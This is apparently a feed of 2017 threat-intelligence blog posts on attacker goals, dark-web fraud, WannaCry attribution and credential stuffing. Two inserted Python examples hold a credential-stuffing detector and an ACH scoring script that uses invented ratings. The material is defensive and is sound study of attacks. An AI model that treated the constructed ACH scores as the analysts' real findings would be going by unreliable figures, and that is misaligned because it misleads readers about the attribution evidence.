    Keep Your Eyes on the Prize: Attack Vectors are Important But Don’t Ignore Attacker Goals Fri, 23 Jun 2017 16:45:41 +0000 Reporting on intrusions or attacks often dwells on the method that the attackers used to breach the defenses of a particular organization. However, the goals of the attacker are what matter most to how an organization can protect itself. Those goals reflect the value the attackers place on an organization’s critical assets, which is independent of the value those assets have to the organization itself.

    The table below shows a carefully chosen sample of well-documented attacks on what attackers consider to be high-value or critical assets. It is worth noting the following attacks were performed by a mixture of nation states, mercenaries, nation state proxies, cyber criminals and hacktivists, showing a complex ecosystem. We do not aim to provide definitive attribution here, merely state which are the most likely candidates based on assessments from law enforcement or the wider community.

    High value asset | Sector | Threat actor | Impact on target | Examples
    Corporate IT infrastructure | All | Cyber criminals, nation-state proxies, nation states | Availability | Ransomware such as WannaCry, or destructive attacks such as the one on Sony Pictures Entertainment, deny access to IT resources in order to extort money from the victims and/or cause embarrassment
    Corporate IT infrastructure | All | Nation states | Confidentiality | Russian-affiliated threat groups broke into a voting software company in order to use its IT infrastructure to send phishing emails to subsequent targets
    Customer (WiFi) networks | Hospitality | Nation states | Confidentiality | The Darkhotel APT group used hotel networks to target individuals of interest and deploy malware to customer machines through malicious software updates
    Cryptographic material | Technology | Cyber criminals, nation states | Confidentiality | DigiNotar’s certificate authority was compromised in order to issue rogue certificates for eavesdropping on Internet users in Iran
    Database | All | Cyber criminals | Confidentiality, Integrity, Availability | The RansomWeb attack encrypted the victim’s database covertly; once the database and backups were fully encrypted, the encryption keys were removed, the database became inaccessible and ransom demands were made to the victim
    Financial transaction systems | Finance | Cyber criminals, nation states | Confidentiality, Integrity | Attackers breached various banks worldwide to send money to mule accounts via the SWIFT network infrastructure
    Financial transaction systems | Finance | Nation states | Confidentiality | Alleged Equation Group leaks detail the compromise of the SWIFT service bureau EastNets to extract transaction information from its database
    Industrial process design and development | Manufacturing, Aerospace, Defence | Freelancers | Confidentiality | Su Bin stole component design blueprints and flight test data for sale to competing companies
    Network infrastructure | Broadcasting | Nation states | Availability | TV5Monde’s routers and switches were corrupted by malicious firmware updates, which caused the TV station to cease broadcasting
    Non-public information | All | Nation states | Confidentiality | Hackers allegedly from PLA Unit 61398 stole “thousands of e-mails and related attachments that provided detailed information about SolarWorld’s financial position, production capabilities, cost structure, and business strategy”
    Non-public information | Finance, Legal | Cyber criminals | Confidentiality | Hackers stole non-public press releases about upcoming announcements by public companies concerning earnings, gross margins, revenues, etc. and used this information to conduct trades
    Source code | Technology | Freelancers, nation states | Confidentiality | Attackers compromised Yahoo in order to find the source code so they could forge cookies to gain persistent, unauthorized access to user accounts
    Payment card information | Retail | Cyber criminals | Confidentiality | Attackers stole 40 million records of payment card information from Target’s Point of Sale (PoS) systems by breaking into a supplier who had access to the Target network
    PHI/PII | Healthcare | Cyber criminals | Confidentiality | 80 million customer records were stolen from Anthem; this data may be used for espionage and/or financial crime such as filing fraudulent tax returns and issuing pre-paid debit cards
    SCADA systems | Energy | Nation states | Availability | A cyber-attack was performed against a Ukrainian power company’s circuit breakers, causing the loss of power to approximately 225,000 customers
    Social media accounts | All | Cyber criminals | Availability | Wired reporter Mat Honan had his various cloud service accounts breached and his devices remotely wiped in order to take over his social media account
    Social media accounts | All | Nation state proxy | Integrity | The Syrian Electronic Army hijacked the social media accounts of various global companies in order to spread propaganda

    A common theme running through the above table is how attackers take the path of least resistance to their goals and in the cases where critical assets were not reachable, used a creative approach to monetize the access that they did have.

    Some common themes concerning attacker goals emerge:

    • Attacks are a multi-stage process, and each stage helps the attackers get closer to their goal. An organization may be compromised for its own assets or because its assets help an attacker reach its real target. Financially motivated cyber criminal actors seek out not only directly monetizable assets like payment card information but also assets which can be sold, such as PHI/PII or non-public information.
    • Sectors such as finance and defense are well-known targets for attackers, but following on from the multi-stage theme above, other organizations may find themselves as targets as they are on the “flight path” from the attacker to the intended target, for example, in the case of supply chain compromise.
    • While theft is very common (confidentiality violations), attacks on availability, such as extortion via ransomware, and attacks on integrity, such as source code manipulation, do also occur. Attackers have a diverse set of actions in their portfolio and may use any of them against a particular target.

    By understanding the goals of the attackers, defenders can understand which of their assets need to be safeguarded. Any breach investigation or incident response should attempt, where possible, to understand the goals of the attackers in order to gain insight on how attackers are targeting an organization’s assets.

    Recent attacks like the Nyetya outbreak highlight the difficulty of reaching certainty about attacker goals: there may be deliberate attempts by the attacker to obscure their true goals, and in such cases the different plausible goals must all be considered.

    We recently wrote a blog on five ways security engineering can help to protect these assets.

    Threats From the Dark Web Mon, 26 Jun 2017 16:22:44 +0000 Despite the hype associated with the dark web, maintaining visibility into it is an important component of a comprehensive digital risk management program. In support of our announcement today about the expansion of our SearchLight’s dark web collection capabilities, we wanted to highlight some of the digital risks that can be associated with the dark web in this blog. It is important to note that these risks can also occur on the open and deep web, just as with our previous research on sites like

    Dark Web Risks

    Criminals are stealing customer data through payment systems and they are talking about it on the dark web

    The insecurity of payment systems makes the news frequently. Take the recent Chipotle breach, which resulted from malware on their Point of Sale devices. It’s important for retailers (and any organizations with ATMs or PoS devices) to ensure these devices and their transactions are secure. Having visibility into criminal forum conversations that discuss committing fraud against these devices, third parties or your company is critically important. It is also important to have visibility into the items for sale in criminal marketplaces that could be used to conduct fraud. This can take many forms; it might be a guide for ATM skimmers (Figure 1), or product listings for specific hardware. Having visibility into these dark web conversations can make the difference in stopping or mitigating a breach.


    Figure 1: Dark Web Marketplace offering guides on how to make ATM skimmers

    Criminals are selling customer account details on the dark web

    For banks seeking to protect their customers, gaining visibility and monitoring the dark web can be a highly valuable tool to stop fraud. Adversaries share credit card numbers on IRC channels (Figure 2) and sell accounts on dark web forums (Figure 3). Detecting these activities gives banks better visibility into their customers’ online exposure and enables them to get on the offense to minimize the impact.


    Figure 2: IRC channel sharing and testing customer credit card information


    Figure 3: Accounts for sale on the dark web

    Criminals are taking over employees and customers’ accounts

    It isn’t only a company’s own assets that are at risk; organizations can also gain awareness of the tools used against them. Figure 4 is an example of a tactic used to bypass SMS account verification. Understanding the latest tactics used by adversaries is vital for organizations’ security decision-making and for reducing their risk profile.


    Figure 4: New tool for bypassing SMS authentication offered, mentioning specific sites

    Criminals are conducting tax return fraud

    Tax milestones throughout the year are popular times for fraud, and tax information is in high demand among cybercriminals. Approaching the deadline for 2017’s tax returns, we detected a user claiming to sell access to the PCs of individuals working for accounting companies. The accompanying screenshots indicated that the user had access to information on hundreds of companies in the United States.

    Figure 5: User selling access to an accounting company’s customer information, including sensitive tax information

    Digital Shadows provides the context you need to manage dark web threats

    It isn’t enough to simply detect mentions of company assets and concerns across the dark web. Organizations need the context behind these posts to understand them properly. As a result, today we announced an expansion of SearchLight’s dark web collection capabilities, through which we help our customers manage their dark web threats in five ways:

    1. Detailed Explorer view. View the post in SearchLight’s explorer view to see previous posts by other users on the same thread or post. This enhanced view provides organizations with added context, enabling them to better understand how their company, employees or customers are likely to be impacted.
    2. Dark Web User Background. The incident also provides an overview of the user in question, with their username, date joined, activity levels and reputation. This enables you to understand the credibility of the dark web user, informing your response.
    3. Incident view with context. The incident includes a description, impact and recommended action, all of which are written up by our team of expert analysts. This helps you to make a more informed decision about the risk to your business.
    4. Detailed Source Background. Pivot from the incident into the intelligence view, providing context on the forum or marketplace. This context includes a description, timeline of events, associations, intelligence, and associated sites and social media accounts.

    The importance of our team of data analysts extends beyond adding vital and relevant context. Not all dark or deep web sites can be easily accessed with technology on its own; expert human data analysts must also gain access to closed sources to provide the most relevant view of digital risks. Digital Shadows recognizes that it is critical to complement automation with a team of data scientists and intelligence experts who gain access to closed sources and qualify the data collected to enhance analytic capabilities. This gives our customers the full breadth and context needed to address the digital risks that are most relevant and impactful to their business.

    Figure 6: SearchLight’s incident view, complete with vital context

    Armed with this vital context, organizations are better informed about the risks they face online across the open, deep and dark web, understanding not only when they are mentioned online, but also why, by whom and the likely impact to their organization.

    To learn more about Digital Shadows Searchlight™ dark web monitoring capability, watch this demo video or read our datasheet for more details.

    WannaCry: An Analysis of Competing Hypotheses – Part II Wed, 07 Jun 2017 16:30:52 +0000 Following the furore of last month’s WannaCry ransomware attacks, Digital Shadows produced an Analysis of Competing Hypotheses (ACH) table to make some initial assessments on the type of actor most likely to have been responsible for the campaign. First and foremost, the ACH method was chosen as it allows us to assess the reliability and relevance of the data available on open sources. As with most investigations, new evidence may emerge over time prompting us to re-examine previous assumptions and theories.

    In the case of WannaCry, several, potentially significant, data points have come to light in recent weeks, including:

    • The code similarities found between WannaCry samples from February 2017 and those previously used by the Lazarus Group have been further corroborated by other sources within the security community. We have, therefore, raised the Credibility of this data point to medium and the Relevance to high. Likewise, for reported malware similarities between WannaCry and other North Korean operations, we have also raised the Credibility of this data point to medium.
    • According to Sophos and Nominum Inc., the first evidence of WannaCry was found when a client of an ISP in Southeast Asia hit WannaCry’s “kill-switch” domain. While this type of evidence is not definitive, our own analysis of Google trending data indicated that users in Taiwan were among the first to begin searching for WannaCry. The graph below, taken from Google API data, plots the normalized number of Google searches for the term “wana decryptor 2.0” (the term that appeared on the ransom note) by time and by country. Here we see that users in Taiwan began searching for the term “wana decryptor 2.0” at about 6am BST (1pm Taiwan time). As this graph relies on Google API data, Chinese searches were not included; nevertheless, there is a strong indication that south-east Asia was the first region to be affected by the ransomware.

    Figure 1: Google searches for “wana decryptor 2.0” by country (Please note that the y-axis does not represent the number of Google searches, but is instead a normalized number signifying the percentage of searches in that country for a specific term (in this case “wana decryptor 2.0”) in relation to all other Google searches.)

    • Language analysis of the various WannaCry ransom messages has indicated that 26 of the 28 messages were machine-translated from English. The Chinese-language version, however, appeared to have been written by a native speaker, and contained a typo that was highly unlikely to have been the result of machine translation.

    As before, we considered four hypotheses for this exercise. That the campaign was the work of:

    • A sophisticated financially-motivated cybercriminal actor – H1
    • An unsophisticated financially-motivated cybercriminal actor – H2
    • A nation state or state-affiliated actor conducting a disruptive operation – H3
    • A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Once we add the new and amended data points, the table looks as follows:

    Figure 1 – ACH diagram

    While the above points do not drastically change the outcome of our initial ACH table, the inconsistency score between H2 (an unsophisticated cybercriminal actor) and H4 (a nation-state or state-affiliated actor looking to discredit the NSA) does narrow. With so little between them, the margin of error is such that both scenarios were equally plausible. We therefore assessed that, based on the information available at the time of writing, the WannaCry campaign was most likely launched by either:

    a) An unsophisticated financially-motivated cybercriminal actor – H2

    b) A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Alternative hypotheses?

    As rightly mentioned by Pasquale Stirparo in a recent SANS blog referencing Digital Shadows, the ACH technique encourages collaborative discussion and alternative viewpoints. Our original aim in creating this ACH was to provide a structured analysis of the general type of threat actor responsible for WannaCry and – perhaps more significantly – this actor’s potential motivation. Our four original hypotheses were, therefore, fairly broad, and we have avoided focusing on specific threat actors given the inherent difficulty in providing attribution. Pasquale built upon our original ACH table by adding new data points and three alternative hypotheses, and we hope others will attempt their own analyses and further highlight the usefulness of this technique. While Pasquale chose to break out H4 into separate hypotheses for a (1) nation-state actor aiming to discredit the NSA and a (2) generic threat actor with the same motivation, we have decided to uphold our original four hypotheses given the overlapping objectives of these actors.[1]

    The death of Lazarus?

    The Lazarus Group remains one of the most difficult actors to incorporate into our ACH analysis, for several reasons. Firstly, there is still no clear, confirmed explanation of who this group is and how it operates. We have previously assessed it to be highly likely that the group has some affiliation with the North Korean state (DPRK), because a significant proportion of the group’s activities are aligned with North Korean interests. While Lazarus’ pre-2016 activity mainly consisted of espionage-focused and disruptive operations, its more recent operations, such as the reported attacks on SWIFT banking networks, appear to be financially motivated and more akin to the actions of an organized criminal group. There are, therefore, many unanswered questions: is Lazarus a standing unit of the DPRK’s intelligence services? If not, is it an organized criminal group? Lazarus command and control infrastructure has, at different points, been identified on both North Korean and Chinese ISPs, so where is the group based? As we have yet to detect any conclusive evidence directly linking the group’s more recent financially motivated activity to the DPRK, we have developed alternative hypotheses for the nature of the Lazarus Group:

    1. The Lazarus Group is an organized crime group (OCG) based outside of the DPRK but with connections to the DPRK state via a relationship with foreign service elements of the Korean People’s Army (KPA). The group is tasked to perform operations on behalf of the DPRK by a case officer, but also operates for private profit.
    2. The Lazarus Group is a KPA unit, but does not always operate based on direct taskings and sometimes its operators conduct financially motivated operations. The unit is based outside the DPRK, which facilitates this activity.
    3. The Lazarus Group is not a single entity. Multiple individuals or groups have gained access to technical assets developed by the Lazarus Group through intentional or unintentional leaks, thefts or through sales.

    The nebulous nature of Lazarus creates obvious difficulties for our ACH analysis. Do we consider it a nation-state actor (therefore falling under H3 and H4), or an organized criminal group that at times works on behalf of state actors (H1)? Without a clear understanding of what type of threat actor Lazarus is, it becomes very difficult to incorporate it into an ACH analysis designed to tackle our original question: what type of actor was most likely to have been behind the WannaCry attacks?

    This is not to say that we are discounting the Lazarus Group. Far from it. The group could easily be considered as an example of three of our four original hypotheses (H1, H3 and H4). With H4 being one of our two most plausible scenarios, the case for Lazarus has certainly not gone cold. The new data points we have added – specifically that users in south-east Asia were reportedly among WannaCry’s first victims and the original ransom note was written by a native Chinese speaker – also point towards an East Asian nexus, which may or may not be significant for those considering a Lazarus Group attribution.

    This approach encourages collaboration within the community and enables us to think critically about evidence. By incorporating ACHs into their analysis, threat intelligence teams can make sense of the various pieces of evidence and better understand the likely motivations of adversaries.


    [1] We would also like to thank Pasquale for highlighting a formatting error in our original blog post that led to a small discrepancy in the inconsistency weighting score for H2.

    7 Tips for Protecting Against Account Takeovers Mon, 22 May 2017 19:16:16 +0000 In May 2017, an amalgamation of over 1 billion credentials was uploaded to the Have I Been Pwned database. One of the lists has been dubbed “Anti-Public”, and contained 457,962,538 unique email addresses. This list has reportedly been widely circulated and used for credential stuffing attacks, whereby attackers seek to identify instances of password reuse in order to compromise further accounts. (“Anti-Public” is also the name of a credential stuffing tool used to verify the legitimacy of compromised credentials.)

    What is Credential Stuffing?

    Credential stuffing is a type of brute force attack whereby large sets of credentials are automatically inserted into login pages until a match with an existing account is found. Our latest whitepaper looks at what credential stuffing is and what tools are being used for it. Later in this blog, I will outline seven tips you can take to protect against account takeover.

    There are billions of leaked credentials exposed online, so the chances are that many of these contain reused usernames and passwords. These are valuable to cybercriminals, who are increasingly turning to credential stuffing tools to automate attempts at account takeover. By looking at the site sentry[.]mba, it’s possible to get an idea of the most targeted organizations and sectors. Common targets for these attacks are the gaming, technology, broadcasting and retail sectors (see below).

    Figure 1: The most prevalent sectors, based on the number of configuration files shared (green) and downloaded (purple) for organizations

    There are many credential stuffing tools available to cybercriminals but three stand out: SentryMBA, Vertex and Hitman. Our paper takes a look at how easy it is for cybercriminals to execute account takeovers. To protect yourself against account takeover, implement the following:

    1.  Monitor for leaked credentials of your employees. Troy Hunt’s Have I Been Pwned is a great resource for this, alerting you to breaches that include your organization’s email domain.

    2.  Monitor for mentions of your company and brand names across cracking forums. This can help to direct your security investment. Use Google Alerts for this; Johnny Long offers some great tips for doing so, and Google Alerts can provide a good indication of the specific risks to your business. Configuration files for your website that are being actively shared and downloaded are probably a good indication of impending attempts at account takeover.

    3.  Monitor for leaked credentials of your customers, allowing you to take a more proactive response. Consider alerting your customers that their email has been involved in a breach, prompting them to reset their password if they have reused credentials.

    4.  Deploy an inline Web Application Firewall. Commercial and open source web application firewalls, like ModSecurity, can be used to identify and block credential stuffing attacks.

    5.  Increase user awareness. Educate your staff and consumers about the dangers of using corporate email addresses for personal accounts, as well as reusing passwords.

    6.  Gain an awareness of credential stuffing tools. Keep an eye on the development of credential stuffing tools, and monitor how your security solutions can protect against evolving capabilities. Some credential stuffing tools are able to bypass some CAPTCHAs, for example.

    7.  Implement multi-factor authentication that doesn’t leverage SMS. This can help to reduce account takeovers, but make sure this is balanced against the friction (and cost) it can cause.
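    The detection logic tip 4 asks an inline WAF to apply, as an added example that is not code from this post or from Digital Shadows: it finds the replay of a leaked credential list (one client cycling through many distinct usernames, mostly failing, inside a short window) and lists the accounts that logged in successfully during that burst, which are the ones to reset under tip 3. The log format, field order and thresholds are assumptions, and the log lines are constructed.

```python
"""Credential-stuffing detection over login logs.

Added example, not code from the post or from Digital Shadows. The log
format, field order and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed sliding window
MIN_ATTEMPTS = 6                # assumed minimum attempts in one window
MIN_DISTINCT_RATIO = 0.8        # distinct usernames / attempts (list replay)
MIN_FAIL_RATE = 0.7             # a replayed list mostly misses on any one site

# Constructed sample lines: "<ISO timestamp> <client IP> <username> <result>".
# 198.51.100.5 is a real user mistyping a password; 203.0.113.7 replays a
# list and gets one hit, which is the account that needs a forced reset.
SAMPLE_LOG = """\
2017-05-22T19:00:00Z 198.51.100.5 carol@example.com FAIL
2017-05-22T19:00:12Z 198.51.100.5 carol@example.com OK
2017-05-22T19:00:01Z 203.0.113.7 u1@example.com FAIL
2017-05-22T19:00:02Z 203.0.113.7 u2@example.com FAIL
2017-05-22T19:00:03Z 203.0.113.7 u3@example.com OK
2017-05-22T19:00:04Z 203.0.113.7 u4@example.com FAIL
2017-05-22T19:00:05Z 203.0.113.7 u5@example.com FAIL
2017-05-22T19:00:06Z 203.0.113.7 u6@example.com FAIL
2017-05-22T19:00:07Z 203.0.113.7 u7@example.com FAIL
2017-05-22T19:02:30Z 203.0.113.7 u8@example.com FAIL
"""

def parse_log(text):
    """Group (timestamp, username, success) events by client IP, time-ordered."""
    events = defaultdict(list)
    for line in text.splitlines():
        ts, ip, user, result = line.split()
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events[ip].append((when, user, result == "OK"))
    for evs in events.values():
        evs.sort()
    return events

def detect_stuffing(text):
    """Return {ip: stats} for clients whose busiest window looks like stuffing."""
    flagged = {}
    for ip, evs in parse_log(text).items():
        start = 0
        for end in range(len(evs)):
            # Advance the window start so it spans at most WINDOW of time.
            while evs[end][0] - evs[start][0] > WINDOW:
                start += 1
            window = evs[start:end + 1]
            n = len(window)
            if n < MIN_ATTEMPTS:
                continue
            distinct = len({user for _, user, _ in window})
            failures = sum(1 for _, _, ok in window if not ok)
            if distinct / n < MIN_DISTINCT_RATIO or failures / n < MIN_FAIL_RATE:
                continue
            # Keep the largest qualifying window seen for this client.
            if ip not in flagged or n > flagged[ip]["attempts"]:
                flagged[ip] = {"attempts": n, "distinct_users": distinct,
                               "failures": failures,
                               # Logins that succeeded inside the burst: reset these.
                               "compromised": sorted(u for _, u, ok in window if ok)}
    return flagged
```

A per-client-IP key is the simplest cut; tools that rotate source addresses through proxies spread the burst across many clients, so the same window logic is worth running keyed on other request features as well.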

    WannaCry: An Analysis of Competing Hypotheses Thu, 18 May 2017 17:35:21 +0000 On 12 May 2017, as the WannaCry ransomware spread across computer networks around the world, a variety of explanations also began to worm their way through the information security community. Who was responsible for the WannaCry campaign? And what was the objective? Ransomware suggested it was the work of cybercriminals, although, given the sheer scale of infections and disruption, some commentators suspected the hand of a nation state. Despite relentless analysis from the security research community that has brought fragments of new information to the fore, no consensus has yet been reached on an attribution for the campaign.

    One of the most recent theories put forward rests on a possible connection between WannaCry and the Lazarus Group, an actor that has previously been linked with several high-profile network intrusions and assessed as highly likely to have some association with the Democratic People’s Republic of Korea (DPRK). Analysis has indicated that WannaCry samples from February 2017 contained a small section of code identical to code used in previous Lazarus campaigns. At the time of writing, however, we assessed there to be insufficient evidence to corroborate this attribution to the group, and alternative hypotheses should be considered. While malware may initially be developed and used by a single actor, this does not mean that it will permanently remain unique to that actor. Malware samples might be accidentally or intentionally leaked, stolen, sold, or used in independent operations by individual members of a group. It is therefore important to consider other factors, such as the consistency of an operation with previous activity attributed to an actor.

    Digital Shadows has, therefore, applied the Analysis of Competing Hypotheses (ACH) technique to the information currently available from open sources. ACH uses a weighted inconsistency algorithm to assign numeric values – weighted by the assessed reliability and relevance of each data point – that represent how consistent the available evidence is with a given hypothesis. While the aim here was not to provide a conclusive attribution for the WannaCry campaign, this structured analytical technique allows us to assess the reliability and relevance of the data presented thus far, as well as make some tentative assessments of the type of actor most likely to have been behind last week’s attacks. As such, we compared four hypotheses for the purposes of this exercise. That the campaign was the work of:

    • A sophisticated financially-motivated cybercriminal actor – H1
    • An unsophisticated financially-motivated cybercriminal actor – H2
    • A nation state or state-affiliated actor conducting a disruptive operation – H3
    • A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4
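    The weighted inconsistency scoring described above, together with the re-rating Part II applied once the Lazarus code overlap was corroborated, as an added example that is not Digital Shadows’ ACH table or tool. The Low/Medium/High factors, the penalty per rating, and the sample evidence ratings are assumptions constructed for illustration, not the scores behind the blog’s own table.

```python
"""Weighted inconsistency scoring for an Analysis of Competing Hypotheses.

Added example, not Digital Shadows' table or tool. Each data point is rated
against every hypothesis and only inconsistent ratings count, weighted by the
point's credibility and relevance. Scales, penalties and the sample ratings
are constructed for illustration and are not the blog's actual scores.
"""
HYPOTHESES = ["H1", "H2", "H3", "H4"]

# Assumed factors for the Low/Medium/High credibility and relevance scales;
# a data point's weight is their product.
SCALE = {"low": 1, "medium": 2, "high": 3}
# Assumed penalty per rating; consistent (CC, C) and neutral (N) cost nothing.
PENALTY = {"CC": 0, "C": 0, "N": 0, "I": 1, "II": 2}

# Constructed evidence: (label, credibility, relevance, rating per hypothesis).
EVIDENCE = [
    ("Ransomware used to extort payment", "high", "medium",
     {"H1": "C", "H2": "C", "H3": "II", "H4": "I"}),
    ("Leaked NSA exploit used for propagation", "high", "high",
     {"H1": "N", "H2": "N", "H3": "N", "H4": "CC"}),
    ("Scale and indiscriminate spread of infections", "high", "high",
     {"H1": "I", "H2": "N", "H3": "C", "H4": "C"}),
    ("Code overlap with earlier Lazarus samples", "low", "medium",
     {"H1": "I", "H2": "I", "H3": "C", "H4": "C"}),
    ("First victims reported in south-east Asia", "low", "medium",
     {"H1": "N", "H2": "N", "H3": "N", "H4": "N"}),
]

def weight(credibility, relevance):
    return SCALE[credibility] * SCALE[relevance]

def inconsistency_scores(evidence, hypotheses=HYPOTHESES):
    """Sum weighted penalties per hypothesis; lower means more consistent."""
    scores = {h: 0 for h in hypotheses}
    for _, cred, rel, ratings in evidence:
        w = weight(cred, rel)
        for h in hypotheses:
            scores[h] += PENALTY[ratings[h]] * w
    return scores

def most_plausible(scores, margin=0):
    """Hypotheses within `margin` of the lowest score; more than one
    means the evidence cannot separate them, as Part II found for H2/H4."""
    best = min(scores.values())
    return sorted(h for h, s in scores.items() if s - best <= margin)

def rerate(evidence, label, credibility, relevance):
    """Copy of `evidence` with one data point's credibility and relevance
    replaced, as Part II did once the Lazarus overlap was corroborated."""
    return [(l, credibility, relevance, r) if l == label else (l, c, v, r)
            for l, c, v, r in evidence]

if __name__ == "__main__":
    before = inconsistency_scores(EVIDENCE)
    after = inconsistency_scores(rerate(
        EVIDENCE, "Code overlap with earlier Lazarus samples", "medium", "high"))
    print(before, most_plausible(before, margin=1))
    print(after, most_plausible(after, margin=1))
```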

    Using a mixture of primary and secondary reporting, as well as assessments from Digital Shadows analysts, we have included a collection of the most salient data points to have emerged at the time of writing. As well as the widely-discussed use of the DOUBLEPULSAR backdoor dropper, ETERNALBLUE exploit, and SMB vulnerability, the latter for propagation, we have included several other pieces of eviden